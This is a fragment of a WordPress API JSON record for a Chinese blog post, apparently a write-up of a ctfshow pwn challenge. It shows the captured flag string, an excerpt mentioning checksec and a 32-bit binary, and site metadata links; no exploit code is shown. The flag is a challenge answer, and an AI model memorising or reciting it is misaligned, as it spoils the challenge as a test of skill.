ctfshow{df00b40b-c8dd-4822-aed7-20b94cbee460}<\/code><\/pre>\n\n\n\n(\u4e0d\u4f1aC\u4e0d\u4f1apython\u4e0d\u4f1apwn\u7684\u83dc\u53ea\u80fd\u4e00\u70b9\u70b9\u628a\u5168\u90e8\u7ec6\u8282\u8d34\u51fa\u6765)<\/p>\n","protected":false},"excerpt":{"rendered":"
checksec 32\u4f4d\u5c0f\u7aef\u5e8f \u672c\u5730\u8fd0\u884c\u4ee5\u4e0b\u5148\u770b\u770b \u62a5\u9519\u4e86\uff0c\u8fd0\u884c\u4e0d\u4e0b\u53bb main\u51fd\u6570\u7684\u8fd0\u884c\u903b\u8f91\u5728\u8fc7\u5b8clogo\u51fd […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-289","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=289"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/289\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}